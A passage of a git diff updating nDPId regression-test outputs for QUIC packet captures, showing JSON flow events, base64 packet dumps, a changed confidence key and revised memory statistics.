-00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600365863681,"flow_last_seen":1600365863681,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1600365863681,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"video.fmct2-3.fna.fbcdn.net","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} +00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600365863681,"flow_last_seen":1600365863681,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1600365863681,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"video.fmct2-3.fna.fbcdn.net","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1600365863701,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1600365863701,"pkt":"AAAAAAAAAAoAaIxPht1gAAAABNgROz9l7On+cW4q+s6wDAAANY4qrM331QZ4B5CSB1+pY\/SrAbvg8wTYmwjO+s6wDgAIQAXJhFchLk8ARL4QIqQn9j8g7J8Bh4qCkeFtB5\/0FGTn+dKSN5WCFIbqlv7bVzxI20ou9DR4wZtJJ1tiJ+xKr0U8bw68OiZZpHUxdfAbQt5z9nLh6LwQjhupiCyRyGRG4tZtrrKw42zS4Ryis2IGVu85jtVJ5nO+V0iHkiCiLoE8hCZ0cGFWISDSv1dY3S14L6Uo3v29iGRvafufSczvMFlG6pV1Odn60vjKDyGOsjNfQ9JF1v3zXLwm1apIxIVcfBTY7dYxW+7A\/6rJf9YKYeoWeijbkQb34JP1dRaHcbT0etmi0uxefz\/YpbkDoFCI2oRZYlTE23H22X2\/8qTclFOyvh9\/vrwFZRygQGeuEH0eSUfPKF67ybi2A9VLUgtZeELBeNOyIaY60evevqb5J2vN5l8HhG0zOtje8P2BEWzkJo0Csm59hN04WUIa5ATdibyB79oIitMR\/RT8b5BC7j9v8ipjp7vZOZEdpCwIDJgn2+33CJSdL94AfQkLgk+uiUPVfgG6UfHrZnytLApyrmygXaAukdakyxq8klTjQRRDyfNa3VwsyyGBmq5gY8nskXcJNY50BpTnu2okLH4hDlVPoMhoCfYEzT7EHkcCPMiRCP1enF\/yeF8dCloVpkR+7DVld9MS6A1Lm8Vh1cgyHuQtCdgJL16zetK\/eyN+QHBXERWmIl3nQXc4BBMK5ejTHXiedJd7krVe8qEtgPgfs9wmex+wAK7s5a4apAlIsdt8wz8irGiTLVD13enE0LCSiK+iT4XC+unYkKdA\/Y+wC15ozprq5ssSs4BUO4\/LwAxujOwLjXa68Kc\/HILSJzhfUsfYNAz8ZOR1P4+bGu9drz2VDwRHLiESKyby173GizQy9QPlUMhgv8zZQ9s8\/V4XeqMJ2FBmnAhANLW8ozDP3m1tk1Eysb4\/m\/zhRgvMN6Md\/gGHDzGnf86ee9efaPJdzEGlKuMWsJB9rG8dFeoooOlhDVE0RcRoPulOkfUBVPkd5y1hJVChJAS8upfL7rieCvjioLCngyXZRWw5EtbWEua8f58+BR4BcVUt44qeVBM19jSN8fMZZCruGfLvFJ8LXrWCMFf8QO9ppSf6AUMeDx2xJm\/vFPFkKj8USDUUV3A4BGBehJmSMJTIQdNx+L65jyOdOELItpQ53YcWuejF0bJ6ksEA2i+ns6L\/A4TyViXUhBAVmjDLSCellA9lXrJ4FKFi2ddTtc7XO4WCnc0rXB48fPr0idZPP5kV7JjzsYEnZ8xNPrb2\/crCya5nVZMRH13HQUZZTbK+kcSm91aipEqc2RxTK15a3fE2lVuvJTMS7pY+WzcwkPFNhssmcyRE4TsroEk6noloCsxsQjvyZSEcSwSKx4KJegr4NeCh6RxPXe153PB1fX43\/bpL23QEtBIoibzoy6LAuxzsnv2SoFcWb+0UW2hrfng6tjiLOL78QaL2I0pt8Q8p5cHXe8AZixhNLMuBlkVaMkSQfTYE7a0q89JM+YV0fG49Y5VAbDOBtfzmYnlO9p9ri9AifV7FZEwCvdDlnQ+KvbXRJdIOtcMSTz6mCvUiZ2cGGkiUCLImG1NMuhrftxnzx3oMcBYdm8CBM4CS3ZhaADSEfSg2j+9P8DImBKXKQw=="} 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1600365863701,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1600365863701,"pkt":"AAAAAAAAAAoAaIxPht1gAAAABNgROz9l7On+cW4q+s6wDAAANY4qrM331QZ4B5CSB1+pY\/SrAbvg8wTYHDzk+s6wDgAIQAXJhFchLk9Ev6msTcUGYFaKjK1nnOGqPfgGmbd2yH7YezNJksz4ObKOyK4ooRfPYXnIwINVzU9kFmpDrySNcGo7oy085NMAXtrRBQxP\/BNGfiNh2k7HVEmtnbBrN9B4q0PdqBJlnR3nfvlqn4KMbB+v3pyflyp0t2eXjVN9BCvAEWt1323hMhRhYp7IjuM\/7LS+4JZqwAit2H9\/as8+O1Z3qJKcua5iRqQUGQX4hx+lXxOP6XwWXKQ9UBS95a7rhiJrqp9UhK13hVq2njbzA2RTKn+s6aobHuCe7WYl8MS0v+T1I2mq6xhFweTuG3hdPnqOkRm4ZoVgOJD0lCKOsJoqR\/flxx3xDBRfRXA8iUDaNTTEDU\/z02HAUlthQ7j4NctXjWeuXBBlOg7myIMc\/qdP9kFsh+WR6c3MixjpAvWeqwTgRfaK9+1rOtle4mwbhL9JoI7ra+3Gv2NscrKYby4y26dOybmnMTxwtUycCSAskoGy0VBL8N4JHmZ24PfumlXDiIGg2TKa89dG5C\/HkH2BkzPa1N4KDB4DWk6vrxpVEaDtN+T4HBAwv5vr27n4ZsI+e+KkpDTUVeRt50at0s6GoBT3dU0bS5u7btTCPh9Q1wT2QzGXBx7LpZUB7WKGCAuzDm\/R\/0DsgE98U+jp\/GQA0cAouUv\/ia5B4dArOX2Hrh68\/LWZUcgSOk4Mb6isI1HW4FG8qqFdvzMsYyg1nY6\/mwkjTgfzcUcT8HuT8b3VEAFl1iojo++o6URU0CqxVGRv\/\/1U12juUa9BOlngQwkpzTFGYZpnjBvHYYqGgaZguBUx+OsJazqFqHN19AyL0Cexa75QT9qZtk9tlxGc5gUfqCX+xv3PoF1DxwRReTjQ6GUHNrQvfC+a6lJLkY2Bl3ty6kTSniC0uwNMTlaRzlXCmLXOF\/spgpAb4J+XbuA0NFIBJPbBj0R9yb2qZMfcDSVc01ubKMDR7P8+q\/ujxavqxlOlRZ7sWwAht5G68KiSsHb\/3\/\/02Hn9LDN5RMC7i0XnG5j+4mV0HA\/xhs5p4cwjOIcpOhsDt89zfffoiq59dKLm9k8JMdheqZnJmgMgBN6WVdrtRW3QVuAWi5RMKLwkPwNbBlRiZ7vzcC0isWQeIhVQokyi3N3zirO2CgYfmItTVGQ2zRdOvhKQCqtBpADZshhP71+ve\/mG\/ZuBnSTjROHtGsF0IToyFyclFG850LYNt2AK7xXn6KoFoVxoXz2L1VgOHjSwdoUQ19OP2FjGJxXDbRibAbzK8ZTPhWbes9V2wQus09AwDRo1tAPoOt8iAFo0luKi1hunaWIbYQU7ulHqooKgCNKaw7Wpw5p7aBaAi2l+FM0QE0XvSek9UgM9xUI8mGJp9C08XT9sbpCwgHL3HCxNUV5PMTiLkvNmY4VY0RA6MyaCk5fo74e5RCmQDSSqS96ehyCpgP+n+wZ6UBRKek9YDjVH4RHvmZCvYco7SKBDJbbMddFHN3+HFbSO2rxv8iuy6DZaiePYnuW\/mxUn+OUffPWu97Jt4A0bz8W3eamvrlSSbu6c70YR1qFE42450VRE4NhhFL8v\/i0jKrz069uRv1GcqnqW1Vv22X49oie0v9YMThrSkmy8c0tELsKMRwtXMA=="} -00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1600365863681,"flow_last_seen":1600365863839,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":24449,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1600365863839,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} +00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1600365863681,"flow_last_seen":1600365863839,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":24449,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1600365863839,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":24449,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1600365863839} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880427 bytes -~~ total memory freed........: 5880427 bytes -~~ total allocations/frees...: 118165/118165 +~~ total memory allocated....: 6014061 bytes +~~ total memory freed........: 6014061 bytes +~~ total allocations/frees...: 120927/120927 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 2153 chars diff --git a/test/results/quic-v2-01.pcapng.out b/test/results/quic-v2-01.pcapng.out index 45cb1e61f..d49cd00bf 100644 --- a/test/results/quic-v2-01.pcapng.out +++ b/test/results/quic-v2-01.pcapng.out @@ -2,10 +2,10 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643108746209} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643108746209,"flow_last_seen":1643108746209,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1643108746209,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643108746209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1643108746209,"pkt":"CAAnfrFjCgAnAAAACABFAgUAYl5AAEAR4XTAqDgBwKg4xoW1EVsE7AiU1XCaUMQIcS7WREhCV\/wIS6wx1HkzRzIARMpgEngor+SP9cKuZZ790399gfWZ0vz0FxYf3xs2l5F+jOUhVUm0eAuyWRJBLQArRRvX1qo16xZ7zI8FmeYud7mt05kYcpsLS0CK5YUUgnCsMjxal9+nmWnSgnUmuD4YMiDaT6\/KWxcW3IdsDGvbq4FeykelUyMNsUCZYyDrZ6tsJBdjOLQQFa+vzk75NiOy5EmEJ6SPOLrba70kLVHmTVrPs01TngptArQ7FyxB2fdFSCA98+vX1vy+0dxofLlBkhde4Ecbnz9YOSqzBYGBTufEgJaDB4JmPJGKd1oAGP7HmhM5nY3WzYdZ5vvX8uiInd7bKxEse8tCV2SEo4DkcuQF861+wGMhMPWJ0aZB+JogqwR55Ko7mR6S6YESBAum9bWYFXEgpEt3H4x2FczwRrrcfA9q4zQBLi8fNbFCBDZugGFHVWEWeExGDJ5N9Vm5k+5RxA76cZBEl7Ri9SCuAvo\/SVHd23+Pk6NwInTw+pU1Xi8DrCOSBpDUPy9oc9sZ0k+WLrevXGals6+J\/S3cgvga0IDGpm4KD3fPl8Mx6m2dMLi6VSzIGZitxZfQbx3pwxbh36emZdZVyxAVPQ6KsKixf3p+65+SqFGSH5IsN0vmfHJCQ5QiTTFwj56WFnghOsO3etGKlaSytkaT4qe8ZRheiBZmOeYegDYef4+iV2ZwAJRhlZArgrSyARWB4JR9MQKmc2r6sdMQGQIXKHFtJtIM5FjupxjaypWAyo21FHg0Pr82Ajw494E3kZ9bG9LGZwvm63PaW\/uzgr9hBYDLBuOu03NTnICf+thHnuXyQPXQzzH+VGtF+WeahwU6RqIydmLAGdtWh3oSwaLxdHDfQwmjlW\/kGW3cZ7xq9lxGSvY5PtPXlIWQOD3GcHgAowz48DO3fyd57+xXqrOEqRzXgYSI3ZAmKCXukVrornbFLllIzBhH\/fmW4yoI8emKYYJEMPEB5t\/20YhBtskEtZn50ef3Us2nRO2IkEmxYNIujXPh5cEVi9z+SvL+onhjjikDdkg1OMOb88MXNKAesAdJ81Dsgw53s2aapp3YuCDR8S4XCpmT4SsXeUwHmkorOfoDi8HNdKXSHWdiNQFwhNWuRv2iwE0Re4wNzacPeolWV9z7vo1ftVC0KYCnypCGOk94YggW\/E6WhIwKFaCFDmbu5TtyVWbWhyxsyHOb8WF5IuDY+zaYH4gDcAnVNC52Db3S2zQuttNi9ommHQHIbwv08Dt6PNfw0EneP0D79tGO9Zuk9B3hxnt28Wwxy433MighVva9zw6tDCeZ1RDo18oMw7RULMTnD8fpyaAjL3Ey6ypEj71EoQQ9p3mk2Jcl4pyIGR5xObSAJplg0ySrcwng5AfFRHm6b4LeGixjGI5tyQotRY7JG0P9hGhbSGTVX0DDQO6ExXPZ8eJqibwqDJ\/HVwgD5t+iO0K0wK+hq8jpO6tPZIekBQAiyVsogudvq3UQlZrCfspM6V3NHLXwDaayGcQEX3J6ErEoEWjSNjgAtQ6o5rv2Wfe+ojGm0YSN+4lCRrNbW6P1KA4pFxW9G57DqCJXNQ\/Cs5Y2v5OhZJlL\/Q1v7E\/lFUki2gYOpi4+wx+16u0e+UbybJFsLwJD0tU\/1QYr6ZfcZ4ae3fIAMg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643108746209,"flow_last_seen":1643108746209,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1643108746209,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643108746209,"flow_last_seen":1643108746209,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1643108746209,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643108746211,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1643108746211,"pkt":"CgAnAAAACAAnfrFjCABFAgUAAoAAAEARgVPAqDjGwKg4ARFbhbUE7O7hnXCaUMQIS6wx1HkzRzII64iRQkuUIpwAQJyCVjJNuDCrTNqXXWMPn6Re4L7SYVwqGIQCQc\/4z9NyAaPCA1EjtACuJoZLCrSNpYRSybpCuKQ+WoUiUllNx92L2MPAGJw7utYFPv5OGHw1\/\/sWndgkLy8hp7pR69\/u09rZKcS+JfFwJmuIf\/ksSjGDUumn50Ay2Rd6o4XXl0HmsmbBIvWvgU6hASVdT4jxaoclAPsXX8CPP0up6Fe0cJpQxAhLrDHUeTNHMgjriJFCS5QinEQVHufFpgZs2aV6du2ZRQqQKDOjoGilHODVeRgnXJ5P7T\/zsZp32p1pLUsBPppTZZgXUGe0MYPRpYRLZP6S2YwCHKWU+l73n0JGtHauiFtNycThrlHgcsb8sk5tcvU6Y6ScYjaBJZo4SvzfNpo4yZWfBNk2UYHfihFbXoBagL8Ni3TJrQD045tOl+1YfuvN63veyZsQEZqEx0dBAmyVl+9xjvqkhzopKh+NpWRz5BIklAlUFmpNduMfQ3T20hAf9mJ3AOigASJmi6bsOzfT+fmMLLJFCGGvf7Vtj5E1FZRVn4fPJh6AHDI4r32EO9lBeOo\/bRxKO\/xtuNE4dXyQrhgsAmgYHZAjkPqRu\/l7804XDa5V8jNWzrthKJ47r2cSNRYsG+fH2fUAebN4YB+rihSsIZxpHY2QnwFGSwB6H7Skxg+Iph02BLynk+Iu8t78JbQQo03RTVad7a1H2K5yGJBnwMaDh8uWKRogMWzILW0GAvr6cB6rKtZvIB6iaFRtpW21wxF6FMiWghHWS2MMSMwh35jVZuDUmDisttokt9hNGZX0VcNuKmWidzlE8BvnwG5U\/lPWrVnAvZVmrZTmpKOyI5TR7nxh84GrxxCAx17MsDCnck39parnwVt\/QNJg4GreMjaXUUPTYWQryOwbG6s95MTEr3kfYLs4mW1uf0zDrci29F2sFu\/C\/HmqkFvZ0OOGC+62wGqGORW\/vlf01u6eGRup6wAte8fwWPF\/vwQLZV4\/zxpFUgF0tAqfKM3PO4Haxa9nHsPVZrUGZMlLFWcB4nBKG1NdoHQpFnsMhBc+wza2JrPisqt5PiVyJC6OvV\/cU7ww3Rc1ZbzC4jloEENrow5U5qEqSaBP1zNwYznCuMne7LwjmE8EnIma1wUrAiD9QtQZyRcWI2tpjtba1QsGHPmDL5TsbCiu5lRo6fKqxLAw32vAkyC76P1133lt7HXruzSBRhmkFpsQbeMtEt1sNBll1ZQMowIuN84gLLCcft+MTcp3i74\/r8i865o44mVqYEl+o8X\/pbSdpT9L6gLAevV9TpMYpr+mcHT0ieagX7Jnn35uw6zjOtQWRDf+XCisrr1nKY1EVNzop8RK6vKaPR4oivRBODylVd6kbG0JUHAnr0Ix4f91IhN0iE9wN0staG0WUiyWtw\/orMSuxqBfKKdgnMAvmqdZTtqpjXi4aDVPEGseUXFoRd2eIp1NKtyrFMTN8zew2FQfUM5ZPV+mLZOckS47BcCaj33vmjmNhp4PqOibtw4GGIkqKdtzvIDU5hpFJQe3oYXwcGYY3eEEzdtrD2Vx0tDP6Yxy6KvVsm5\/mMYXMhGZoUA1zlKEtVTTbazFot35oVX4ngIUMjLuaLnu+ZQA\/SsjZCeWQrKvnx2aQ0fMdg=="} 01417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643108746211,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":766,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":766,"pkt_l4_len":732,"thread_ts_msec":1643108746211,"pkt":"CgAnAAAACAAnfrFjCABFAgLwAoEAAEARg2LAqDjGwKg4ARFbhbUC3F+UvXCaUMQIS6wx1HkzRzII64iRQkuUIpxBBHClZrSkXwcilginpQcYrC6+gYqStd9rEPJAVa\/X+ectxL4RSmYFqLCVrwpVh1cagxhOComdCEfuthVLRVGijz0VZq73gJfVJDTIt9AqzDxtaVsVpsxn9nkBr8pmVajuM19igvEhLOOlSEyBeUeB0DFdaZHW2\/JO3NISTHIWsZrZsFMVLd9gHsuxJ1cw3ZhmXfOm4UQbO0gsJiSVP1hEVffenYC7rMaAhCUYN9+RJxV5yNtMPMGyD3sgFiZTkHnxcTLuuCOpBBBkbts\/gMCM9IZChkDacnOh2OF9\/ohY3MEFlrim9kn0Lkww\/L7utDiRt6G4nl7rnCzjkcY3xLHSfS\/UQGApX0usMdR5M0cyG4HtNIk9Hu3yusEW1qJhexs\/jd2MFqPbzXoJkoBqBRJp9qv7uPIeaJrkQv0lZW4FoaNVZAxaKV+W4vwOyfLLLUAqbD+eP0q2akwmVXy9Y8QV3RpHIAEJdYstRBWUkoiGbfH\/tn+FdXpRyxXFod1a\/iZeqISyuYA2sKP1DJjEFrTzbkdHxX2JNiQQ2tZ+ApMfsQ0Q3QHD6f2C+xRLtvPcLqXP7RxXsRrD38p085fQ2lzG5FGYGgbhRGLwEvS2xYmIc5SWcIMn4zDkXXhhptIlqESYssWwykAjHZI2+hUtqOdrCizJkWiDODkpCMdaXGRR20dzaKQXdlriwcHLV5d1GvkCwMjcqS+C3ysNw8ltkxZbJAw3X1KjTK669DDz0zSittHV41nQk4SLHBtK3xCfytcsQ2Woqekdb3A1Hgo2e8QMTF4S4OsVjiekXWM847U9xQtRGGBIxOeuuzZN2uX3hL9UxceXknbMIBuTtD1iz9sd5bcqUQJpjX4\/iuJ0SwzD3dHw3Uy0h7w+q864l4fPWvhkeXfYvfcT+Icqi6TMXyciH2pSvVxaT4WJf32OcA=="} -00936{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":923,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":923,"flow_first_seen":1643108746209,"flow_last_seen":1643108746226,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1273220,"flow_avg_l4_payload_len":1379,"midstream":0,"thread_ts_msec":1643108746226,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00936{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":923,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":923,"flow_first_seen":1643108746209,"flow_last_seen":1643108746226,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1273220,"flow_avg_l4_payload_len":1379,"midstream":0,"thread_ts_msec":1643108746226,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":923,"source":"quic-v2-01.pcapng","alias":"nDPId-test","packets-captured":923,"packets-processed":923,"total-skipped-flows":0,"total-l4-payload-len":1273220,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1643108746226} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 923/923 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5906486 bytes -~~ total memory freed........: 5906486 bytes -~~ total allocations/frees...: 119058/119058 +~~ total memory allocated....: 6040120 bytes +~~ total memory freed........: 6040120 bytes +~~ total allocations/frees...: 121820/121820 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 2141 chars diff --git a/test/results/quic.pcap.out b/test/results/quic.pcap.out index ab0f1390e..99e066e5a 100644 --- a/test/results/quic.pcap.out +++ b/test/results/quic.pcap.out @@ -2,40 +2,40 @@ 